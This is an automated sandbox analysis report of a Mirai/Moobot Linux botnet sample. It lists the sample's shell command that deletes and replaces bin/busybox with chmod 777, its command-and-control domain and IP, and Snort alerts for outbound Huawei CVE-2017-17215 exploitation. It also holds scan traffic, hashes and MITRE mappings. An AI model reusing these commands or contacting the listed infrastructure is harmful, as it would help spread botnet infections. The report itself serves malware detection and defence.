            Source: /tmp/sduVQWDj8L.elf (PID: 6232)Shell command executed: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox\\xff\\xec0\\x80 && mv /tmp/sduVQWDj8L.elf\\xff\\xff\\xff\\xff\\xff\\xff\\xecH bin/busybox\\x80; chmod 777 \\xff\\xecHbin/busybox"
            Source: /bin/sh (PID: 6234)Rm executable: /usr/bin/rm -> rm -rf bin/busybox
            Source: submitted sampleStderr: mv: cannot stat '/tmp/sduVQWDj8L.elf'$'\377\377\377\377\377\377\354''H': No such file or directorychmod: cannot access ''$'\377\354''Hbin/busybox': No such file or directory: exit code = 0

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 58510 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 58510
            Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33446 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 33446
            Source: /tmp/sduVQWDj8L.elf (PID: 6230)Queries kernel information via 'uname':
            Source: sduVQWDj8L.elf, 6230.1.00005586b17a3000.00005586b1807000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/m68k
            Source: sduVQWDj8L.elf, 6230.1.00007ffc6ef06000.00007ffc6ef27000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
            Source: sduVQWDj8L.elf, 6230.1.00005586b17a3000.00005586b1807000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
            Source: sduVQWDj8L.elf, 6230.1.00007ffc6ef06000.00007ffc6ef27000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-m68k/tmp/sduVQWDj8L.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sduVQWDj8L.elf

            Stealing of Sensitive Information

            barindex
            Yara detected Mirai
            Source: Yara matchFile source: sduVQWDj8L.elf, type: SAMPLE
            Source: Yara matchFile source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp, type: MEMORY
            Yara detected Moobot
            Source: Yara matchFile source: sduVQWDj8L.elf, type: SAMPLE
            Source: Yara matchFile source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: sduVQWDj8L.elf PID: 6230, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Mirai
            Source: Yara matchFile source: sduVQWDj8L.elf, type: SAMPLE
            Source: Yara matchFile source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp, type: MEMORY
            Yara detected Moobot
            Source: Yara matchFile source: sduVQWDj8L.elf, type: SAMPLE
            Source: Yara matchFile source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: sduVQWDj8L.elf PID: 6230, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Scripting            		Path InterceptionPath Interception1
            File and Directory Permissions Modification            		1
            OS Credential Dumping            		11
            Security Software Discovery            		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Scripting            		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
            Non-Standard Port            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
            File Deletion            		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud

            Malware Configuration

            No configs have been found

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830728 Sample: sduVQWDj8L.elf Startdate: 20/03/2023 Architecture: LINUX Score: 92 27 kamuiv3.hopto.org 2->27 29 197.191.9.206, 37215 zain-asGH Ghana 2->29 31 99 other IPs or domains 2->31 33 Snort IDS alert for network traffic 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 4 other signatures 2->39 8 sduVQWDj8L.elf 2->8         started        signatures3 process4 process5 10 sduVQWDj8L.elf sh 8->10         started        12 sduVQWDj8L.elf 8->12         started        process6 14 sh chmod 10->14         started        17 sh rm 10->17         started        19 sh mkdir 10->19         started        21 sh mv 10->21         started        23 sduVQWDj8L.elf 12->23         started        25 sduVQWDj8L.elf 12->25         started        signatures7 41 Sets full permissions to files and/or directories 14->41

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            sduVQWDj8L.elf49%ReversingLabsLinux.Trojan.Mirai
            sduVQWDj8L.elf56%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            kamuiv3.hopto.org1%VirustotalBrowse

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            kamuiv3.hopto.org
            		103.161.181.97
            		truetrueunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/soap/encoding/sduVQWDj8L.elffalse
              		high
              http://schemas.xmlsoap.org/soap/envelope/sduVQWDj8L.elffalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                197.1.57.226
                		unknownTunisia
                		37705TOPNETTNfalse
                197.223.50.29
                		unknownEgypt
                		37069MOBINILEGfalse
                157.62.68.49
                		unknownUnited States
                		22192SSHENETUSfalse
                41.198.167.191
                		unknownSouth Africa
                		327693ECHO-SPZAfalse
                157.196.171.9
                		unknownUnited States
                		4704SANNETRakutenMobileIncJPfalse
                41.160.135.186
                		unknownSouth Africa
                		36937Neotel-ASZAfalse
                157.78.121.32
                		unknownJapan4725ODNSoftBankMobileCorpJPfalse
                157.65.110.239
                		unknownJapan2514INFOSPHERENTTPCCommunicationsIncJPfalse
                41.85.100.25
                		unknownSouth Africa
                		328418Olena-Trading-ASZAfalse
                197.149.99.193
                		unknownNigeria
                		35074COBRANET-ASLBfalse
                41.85.32.189
                		unknownSouth Africa
                		22355FROGFOOTZAfalse
                157.123.84.139
                		unknownUnited States
                		17623CNCGROUP-SZChinaUnicomShenzennetworkCNfalse
                41.245.242.131
                		unknownNigeria
                		328050Intercellular-Nigeria-ASNGfalse
                76.99.121.19
                		unknownUnited States
                		7922COMCAST-7922USfalse
                220.50.198.219
                		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                60.174.126.96
                		unknownChina
                		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                197.47.50.232
                		unknownEgypt
                		8452TE-ASTE-ASEGfalse
                197.114.33.146
                		unknownAlgeria
                		36947ALGTEL-ASDZfalse
                60.66.153.73
                		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                197.143.47.123
                		unknownAlgeria
                		36891ICOSNET-ASDZfalse
                41.71.234.18
                		unknownNigeria
                		37053RSAWEB-ASZAfalse
                197.240.178.152
                		unknownunknown
                		37705TOPNETTNfalse
                8.99.178.50
                		unknownUnited States
                		3356LEVEL3USfalse
                140.90.136.173
                		unknownUnited States
                		6629NOAA-ASUSfalse
                157.79.18.140
                		unknownJapan2514INFOSPHERENTTPCCommunicationsIncJPfalse
                41.81.68.209
                		unknownKenya
                		33771SAFARICOM-LIMITEDKEfalse
                197.85.129.148
                		unknownSouth Africa
                		10474OPTINETZAfalse
                157.22.239.131
                		unknownUnited States
                		7091VIANET-ASNUSfalse
                41.210.203.164
                		unknownAngola
                		37081movicel-asAOfalse
                41.79.17.121
                		unknownSouth Africa
                		37317AccessGlobal-ASZAfalse
                189.91.115.118
                		unknownBrazil
                		262589INTERNEXABRASILOPERADORADETELECOMUNICACOESSABRfalse
                157.13.147.166
                		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                41.179.121.15
                		unknownEgypt
                		24863LINKdotNET-ASEGfalse
                41.133.51.51
                		unknownSouth Africa
                		10474OPTINETZAfalse
                197.173.179.158
                		unknownSouth Africa
                		37168CELL-CZAfalse
                189.212.136.49
                		unknownMexico
                		6503AxtelSABdeCVMXfalse
                197.91.153.1
                		unknownSouth Africa
                		10474OPTINETZAfalse
                60.149.106.117
                		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                197.111.127.234
                		unknownSouth Africa
                		37168CELL-CZAfalse
                41.152.192.53
                		unknownEgypt
                		36992ETISALAT-MISREGfalse
                41.133.38.88
                		unknownSouth Africa
                		10474OPTINETZAfalse
                197.87.33.160
                		unknownSouth Africa
                		10474OPTINETZAfalse
                173.87.1.242
                		unknownUnited States
                		5650FRONTIER-FRTRUSfalse
                135.244.77.53
                		unknownUnited States
                		10455LUCENT-CIOUSfalse
                197.151.240.167
                		unknownEgypt
                		37069MOBINILEGfalse
                157.190.98.73
                		unknownIreland
                		1213HEANETIEfalse
                196.102.195.33
                		unknownKenya
                		33771SAFARICOM-LIMITEDKEfalse
                41.87.73.250
                		unknownNigeria
                		37248PHASE3TELNGfalse
                157.126.150.134
                		unknownUnited States
                		1738OKOBANK-ASEUfalse
                41.240.157.149
                		unknownSudan
                		36998SDN-MOBITELSDfalse
                197.199.7.181
                		unknownEgypt
                		36992ETISALAT-MISREGfalse
                186.179.177.66
                		unknownSuriname
                		27775TelecommunicationcompanySuriname-TeleSurSRfalse
                197.10.137.41
                		unknownTunisia
                		5438ATI-TNfalse
                68.87.125.1
                		unknownUnited States
                		7922COMCAST-7922USfalse
                41.138.165.98
                		unknownNigeria
                		20598CYBERSPACE-ASAutonomousSystemnumberforCyberSpaceILfalse
                197.220.166.155
                		unknownGhana
                		37341GLOMOBILEGHfalse
                41.2.68.161
                		unknownSouth Africa
                		29975VODACOM-ZAfalse
                157.35.127.107
                		unknownIndia
                		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                157.159.2.41
                		unknownFrance
                		2094FR-TELECOM-MANAGEMENT-SUDPARISTelecomManagementSudParifalse
                8.158.86.57
                		unknownSingapore
                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                157.132.47.117
                		unknownUnited States
                		7872USAP-ASNUSfalse
                197.223.37.83
                		unknownEgypt
                		37069MOBINILEGfalse
                197.254.179.183
                		unknownLesotho
                		37057VODACOM-LESOTHOLSfalse
                157.87.159.77
                		unknownUnited States
                		21612FUNDACAOINSTITUTOOSWALDOCRUZBRfalse
                197.126.108.8
                		unknownEgypt
                		36992ETISALAT-MISREGfalse
                197.210.224.167
                		unknownNigeria
                		29465VCG-ASNGfalse
                41.252.35.38
                		unknownLibyan Arab Jamahiriya
                		21003GPTC-ASLYfalse
                41.249.173.106
                		unknownMorocco
                		36903MT-MPLSMAfalse
                157.207.174.6
                		unknownUnited States
                		53926APA-US-ASNUSfalse
                197.162.72.182
                		unknownEgypt
                		24863LINKdotNET-ASEGfalse
                197.53.179.35
                		unknownEgypt
                		8452TE-ASTE-ASEGfalse
                157.98.43.113
                		unknownUnited States
                		3527NIH-NETUSfalse
                157.8.148.250
                		unknownJapan4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                41.145.34.34
                		unknownSouth Africa
                		5713SAIX-NETZAfalse
                157.208.202.62
                		unknownUnited States
                		12552IPO-EUSEfalse
                41.219.166.64
                		unknownNigeria
                		37196SUDATEL-SENEGALSNfalse
                64.130.175.217
                		unknownUnited States
                		29894SCRTCUSfalse
                197.99.108.8
                		unknownSouth Africa
                		3741ISZAfalse
                157.111.53.185
                		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                197.105.252.103
                		unknownSouth Africa
                		37168CELL-CZAfalse
                198.245.126.231
                		unknownCanada
                		803SASKTELCAfalse
                157.21.249.79
                		unknownUnited States
                		53446EVMSUSfalse
                138.109.66.95
                		unknownUnited States
                		396290NIELSEN-COMPANYUSfalse
                41.37.96.7
                		unknownEgypt
                		8452TE-ASTE-ASEGfalse
                197.232.116.197
                		unknownKenya
                		36866JTLKEfalse
                41.195.79.205
                		unknownSouth Africa
                		16637MTNNS-ASZAfalse
                157.55.204.10
                		unknownUnited States
                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                157.111.84.4
                		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                157.161.177.122
                		unknownSwitzerland
                		6772IMPNET-ASCHfalse
                41.80.151.200
                		unknownKenya
                		33771SAFARICOM-LIMITEDKEfalse
                17.106.158.120
                		unknownUnited States
                		714APPLE-ENGINEERINGUSfalse
                157.193.175.224
                		unknownBelgium
                		2611BELNETBEfalse
                41.79.184.220
                		unknownTanzania United Republic of
                		30844LIQUID-ASGBfalse
                83.0.173.193
                		unknownPoland
                		5617TPNETPLfalse
                41.134.200.146
                		unknownSouth Africa
                		10474OPTINETZAfalse
                197.191.9.206
                		unknownGhana
                		37140zain-asGHfalse
                197.213.1.132
                		unknownZambia
                		37287ZAIN-ZAMBIAZMfalse
                41.136.251.140
                		unknownMauritius
                		23889MauritiusTelecomMUfalse
                197.108.90.244
                		unknownSouth Africa
                		37168CELL-CZAfalse
                68.206.197.161
                		unknownUnited States
                		11427TWC-11427-TEXASUSfalse

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                Entropy (8bit):6.274480834720636
                TrID:
                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                File name:sduVQWDj8L.elf
                File size:71804
                MD5:73f351e58cf41fb59c37b4196103c026
                SHA1:9337226b4d4876a4cb7eb287678360db263a6ef2
                SHA256:04d57a6c870dec6d92d266d55ca978ab2f69a257e6f8d30e024af364e01ab166
                SHA512:5ea3bc3dc3c022cb0b63367bededc49212077d839ae591f1aa9a95f7268951659f88316a858cedbbb614b1d8399cf63c5dc096c08eabdb1383aa2f6af0ec1a0b
                SSDEEP:1536:fWo3SUqGhiD4DXW80fHL1gxBVvxdJLL011iu7QVc:fWoiUxiEDXiL1aBRx/Lu78c
                TLSH:17634C9AF801DD7DF84BD77F0453090AB930A3D153831B3A6797BDA3BC721992922E85
                File Content Preview:.ELF.......................D...4.........4. ...(.......................>...>...... ........D..3D..3D...h..%h...... .dt.Q............................NV..a....da.....N^NuNV..J9..6.f>"y..3\ QJ.g.X.#...3\N."y..3\ QJ.f.A.....J.g.Hy...@N.X.......6.N^NuNV..N^NuN

                Static ELF Info

                ELF header

                Class:
                Data:
                Version:
                Machine:
                Version Number:
                Type:
                OS/ABI:
                ABI Version:
                Entry Point Address:
                Flags:
                ELF Header Size:
                Program Header Offset:
                Program Header Size:
                Number of Program Headers:
                Section Header Offset:
                Section Header Size:
                Number of Section Headers:
                Header String Table Index:

                Sections

                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                NULL0x00x00x00x00x0000
                .initPROGBITS0x800000940x940x140x00x6AX002
                .textPROGBITS0x800000a80xa80xf50a0x00x6AX004
                .finiPROGBITS0x8000f5b20xf5b20xe0x00x6AX002
                .rodataPROGBITS0x8000f5c00xf5c00x1d7e0x00x2A002
                .ctorsPROGBITS0x800133440x113440x80x00x3WA004
                .dtorsPROGBITS0x8001334c0x1134c0x80x00x3WA004
                .dataPROGBITS0x800133580x113580x3540x00x3WA004
                .bssNOBITS0x800136ac0x116ac0x22000x00x3WA004
                .shstrtabSTRTAB0x00x116ac0x3e0x00x0001

                Program Segments

                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                LOAD0x00x800000000x800000000x1133e0x1133e6.30970x5R E0x2000.init .text .fini .rodata
                LOAD0x113440x800133440x800133440x3680x25682.86380x6RW 0x2000.ctors .dtors .data .bss
                GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.2.2341.46.204.16833446372152835222 03/20/23-16:42:31.188141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344637215192.168.2.2341.46.204.168
                192.168.2.23103.161.181.9751628569992030490 03/20/23-16:40:34.606175TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)5162856999192.168.2.23103.161.181.97
                192.168.2.2341.232.131.21658510372152835222 03/20/23-16:41:11.152192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851037215192.168.2.2341.232.131.216
                192.168.2.23197.214.97.17549218372152835222 03/20/23-16:41:36.868569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921837215192.168.2.23197.214.97.175
                103.161.181.97192.168.2.2356999516282030489 03/20/23-16:42:32.484003TCP2030489ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response5699951628103.161.181.97192.168.2.23

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Mar 20, 2023 16:40:32.600774050 CET42836443192.168.2.2391.189.91.43
                Mar 20, 2023 16:40:32.856775045 CET4251680192.168.2.23109.202.202.202
                Mar 20, 2023 16:40:34.418015003 CET5737737215192.168.2.23157.158.188.175
                Mar 20, 2023 16:40:34.418237925 CET5737737215192.168.2.2341.157.228.113
                Mar 20, 2023 16:40:34.418385029 CET5737737215192.168.2.2341.219.99.175
                Mar 20, 2023 16:40:34.418509007 CET5737737215192.168.2.23197.253.112.134
                Mar 20, 2023 16:40:34.418956995 CET5737737215192.168.2.23171.99.213.77
                Mar 20, 2023 16:40:34.418965101 CET5737737215192.168.2.2341.20.200.11
                Mar 20, 2023 16:40:34.418975115 CET5737737215192.168.2.23126.132.247.147
                Mar 20, 2023 16:40:34.419015884 CET5737737215192.168.2.238.158.15.21
                Mar 20, 2023 16:40:34.419049025 CET5737737215192.168.2.23197.165.156.136
                Mar 20, 2023 16:40:34.419203043 CET5737737215192.168.2.23157.42.65.114
                Mar 20, 2023 16:40:34.419238091 CET5737737215192.168.2.23157.108.14.149
                Mar 20, 2023 16:40:34.419286013 CET5737737215192.168.2.2341.35.249.224
                Mar 20, 2023 16:40:34.419312000 CET5737737215192.168.2.23157.217.145.213
                Mar 20, 2023 16:40:34.419570923 CET5737737215192.168.2.2341.69.250.238
                Mar 20, 2023 16:40:34.419614077 CET5737737215192.168.2.23157.235.172.129
                Mar 20, 2023 16:40:34.419760942 CET5737737215192.168.2.23197.201.116.33
                Mar 20, 2023 16:40:34.419764996 CET5737737215192.168.2.2341.245.242.131
                Mar 20, 2023 16:40:34.419776917 CET5737737215192.168.2.23157.211.201.195
                Mar 20, 2023 16:40:34.419783115 CET5737737215192.168.2.23197.203.8.246
                Mar 20, 2023 16:40:34.419826984 CET5737737215192.168.2.23197.21.87.136
                Mar 20, 2023 16:40:34.420001984 CET5737737215192.168.2.2341.106.161.33
                Mar 20, 2023 16:40:34.420006990 CET5737737215192.168.2.23197.138.118.183
                Mar 20, 2023 16:40:34.420137882 CET5737737215192.168.2.2384.59.223.137
                Mar 20, 2023 16:40:34.420490026 CET5737737215192.168.2.2341.170.104.179
                Mar 20, 2023 16:40:34.420568943 CET5737737215192.168.2.2374.150.93.69
                Mar 20, 2023 16:40:34.420578957 CET5737737215192.168.2.23157.112.226.179
                Mar 20, 2023 16:40:34.420589924 CET5737737215192.168.2.2341.194.243.149
                Mar 20, 2023 16:40:34.420763969 CET5737737215192.168.2.23157.24.174.141
                Mar 20, 2023 16:40:34.420763969 CET5737737215192.168.2.23197.0.226.18
                Mar 20, 2023 16:40:34.420772076 CET5737737215192.168.2.23157.209.177.192
                Mar 20, 2023 16:40:34.420793056 CET5737737215192.168.2.23157.207.229.240
                Mar 20, 2023 16:40:34.420821905 CET5737737215192.168.2.23185.240.108.115
                Mar 20, 2023 16:40:34.420860052 CET5737737215192.168.2.2341.97.9.221
                Mar 20, 2023 16:40:34.421142101 CET5737737215192.168.2.2367.121.157.4
                Mar 20, 2023 16:40:34.421248913 CET5737737215192.168.2.2341.204.161.23
                Mar 20, 2023 16:40:34.421256065 CET5737737215192.168.2.23122.247.154.189
                Mar 20, 2023 16:40:34.421267986 CET5737737215192.168.2.23197.70.109.181
                Mar 20, 2023 16:40:34.421302080 CET5737737215192.168.2.23197.194.15.96
                Mar 20, 2023 16:40:34.421466112 CET5737737215192.168.2.23157.19.18.188
                Mar 20, 2023 16:40:34.421472073 CET5737737215192.168.2.23157.89.32.79
                Mar 20, 2023 16:40:34.421472073 CET5737737215192.168.2.2341.149.215.72
                Mar 20, 2023 16:40:34.421780109 CET5737737215192.168.2.23197.27.156.22
                Mar 20, 2023 16:40:34.421892881 CET5737737215192.168.2.23197.10.2.237
                Mar 20, 2023 16:40:34.421905994 CET5737737215192.168.2.2341.202.21.137
                Mar 20, 2023 16:40:34.421905994 CET5737737215192.168.2.23197.159.182.121
                Mar 20, 2023 16:40:34.421935081 CET5737737215192.168.2.2387.188.1.178
                Mar 20, 2023 16:40:34.422091007 CET5737737215192.168.2.23157.208.158.113
                Mar 20, 2023 16:40:34.422097921 CET5737737215192.168.2.2358.108.150.242
                Mar 20, 2023 16:40:34.422106981 CET5737737215192.168.2.23157.209.112.227
                Mar 20, 2023 16:40:34.422126055 CET5737737215192.168.2.23197.42.3.57
                Mar 20, 2023 16:40:34.422158957 CET5737737215192.168.2.23157.175.90.93
                Mar 20, 2023 16:40:34.422388077 CET5737737215192.168.2.2341.229.4.201
                Mar 20, 2023 16:40:34.422460079 CET5737737215192.168.2.2341.96.182.92
                Mar 20, 2023 16:40:34.422560930 CET5737737215192.168.2.2341.76.199.241
                Mar 20, 2023 16:40:34.422581911 CET5737737215192.168.2.2341.137.57.108
                Mar 20, 2023 16:40:34.422621012 CET5737737215192.168.2.23157.86.237.3
                Mar 20, 2023 16:40:34.422785997 CET5737737215192.168.2.23157.225.131.167
                Mar 20, 2023 16:40:34.422787905 CET5737737215192.168.2.23197.34.148.233
                Mar 20, 2023 16:40:34.422810078 CET5737737215192.168.2.2341.224.217.98
                Mar 20, 2023 16:40:34.422868013 CET5737737215192.168.2.2341.92.146.90
                Mar 20, 2023 16:40:34.422892094 CET5737737215192.168.2.23157.96.66.83
                Mar 20, 2023 16:40:34.422904968 CET5737737215192.168.2.2341.118.96.185
                Mar 20, 2023 16:40:34.422969103 CET5737737215192.168.2.23197.241.118.139
                Mar 20, 2023 16:40:34.423208952 CET5737737215192.168.2.23123.186.225.7
                Mar 20, 2023 16:40:34.423238039 CET5737737215192.168.2.23197.166.82.110
                Mar 20, 2023 16:40:34.423346996 CET5737737215192.168.2.23197.138.141.21
                Mar 20, 2023 16:40:34.423348904 CET5737737215192.168.2.23197.254.12.136
                Mar 20, 2023 16:40:34.423376083 CET5737737215192.168.2.23157.104.244.206
                Mar 20, 2023 16:40:34.423445940 CET5737737215192.168.2.23157.181.110.220
                Mar 20, 2023 16:40:34.423494101 CET5737737215192.168.2.23159.96.157.165
                Mar 20, 2023 16:40:34.423506021 CET5737737215192.168.2.23157.249.14.243
                Mar 20, 2023 16:40:34.423576117 CET5737737215192.168.2.23200.111.204.79
                Mar 20, 2023 16:40:34.423640013 CET5737737215192.168.2.23223.199.71.20
                Mar 20, 2023 16:40:34.423664093 CET5737737215192.168.2.23157.116.254.198
                Mar 20, 2023 16:40:34.423679113 CET5737737215192.168.2.23157.222.234.105
                Mar 20, 2023 16:40:34.423712015 CET5737737215192.168.2.232.228.151.168
                Mar 20, 2023 16:40:34.423866034 CET5737737215192.168.2.23197.246.138.122
                Mar 20, 2023 16:40:34.423866034 CET5737737215192.168.2.23197.93.9.12
                Mar 20, 2023 16:40:34.423922062 CET5737737215192.168.2.23148.195.75.144
                Mar 20, 2023 16:40:34.423978090 CET5737737215192.168.2.23197.87.47.245
                Mar 20, 2023 16:40:34.423995972 CET5737737215192.168.2.23157.49.186.75
                Mar 20, 2023 16:40:34.424057961 CET5737737215192.168.2.23197.41.244.127
                Mar 20, 2023 16:40:34.426611900 CET5737737215192.168.2.2341.238.17.49
                Mar 20, 2023 16:40:34.426651955 CET5737737215192.168.2.23156.28.181.172
                Mar 20, 2023 16:40:34.426736116 CET5737737215192.168.2.23197.41.208.153
                Mar 20, 2023 16:40:34.426827908 CET5737737215192.168.2.23157.189.64.80
                Mar 20, 2023 16:40:34.426829100 CET5737737215192.168.2.2341.165.95.120
                Mar 20, 2023 16:40:34.426851034 CET5737737215192.168.2.23157.108.242.193
                Mar 20, 2023 16:40:34.426888943 CET5737737215192.168.2.2393.150.177.124
                Mar 20, 2023 16:40:34.427292109 CET5737737215192.168.2.23197.111.170.201
                Mar 20, 2023 16:40:34.427336931 CET5737737215192.168.2.23157.39.118.153
                Mar 20, 2023 16:40:34.427467108 CET5737737215192.168.2.23181.182.117.254
                Mar 20, 2023 16:40:34.427480936 CET5737737215192.168.2.23130.84.58.171
                Mar 20, 2023 16:40:34.427486897 CET5737737215192.168.2.23197.67.175.218
                Mar 20, 2023 16:40:34.427587986 CET5737737215192.168.2.23157.200.180.79
                Mar 20, 2023 16:40:34.427608967 CET5737737215192.168.2.2386.243.212.64
                Mar 20, 2023 16:40:34.427608967 CET5737737215192.168.2.23197.108.198.50
                Mar 20, 2023 16:40:34.427617073 CET5737737215192.168.2.23206.27.212.207

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Mar 20, 2023 16:40:34.407533884 CET192.168.2.238.8.8.80x6cabStandard query (0)kamuiv3.hopto.orgA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Mar 20, 2023 16:40:34.429055929 CET8.8.8.8192.168.2.230x6cabNo error (0)kamuiv3.hopto.org103.161.181.97A (IP address)IN (0x0001)false

                System Behavior

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/tmp/sduVQWDj8L.elf
                Arguments:/tmp/sduVQWDj8L.elf
                File size:4463432 bytes
                MD5 hash:cd177594338c77b895ae27c33f8f86cc

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/tmp/sduVQWDj8L.elf
                Arguments:n/a
                File size:4463432 bytes
                MD5 hash:cd177594338c77b895ae27c33f8f86cc

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox\\xff\\xec0\\x80 && mv /tmp/sduVQWDj8L.elf\\xff\\xff\\xff\\xff\\xff\\xff\\xecH bin/busybox\\x80; chmod 777 \\xff\\xecHbin/busybox"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:n/a
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/usr/bin/rm
                Arguments:rm -rf bin/busybox
                File size:72056 bytes
                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:n/a
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/usr/bin/mkdir
                Arguments:mkdir bin
                File size:88408 bytes
                MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:n/a
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/usr/bin/mv
                Arguments:mv /tmp/sduVQWDj8L.elf\\xff\\xff\\xff\\xff\\xff\\xff\\xecH bin/busybox\\x80
                File size:149888 bytes
                MD5 hash:504f0590fa482d4da070a702260e3716

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:n/a
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                General

                Start time:16:40:33
                Start date:20/03/2023
                Path:/usr/bin/chmod
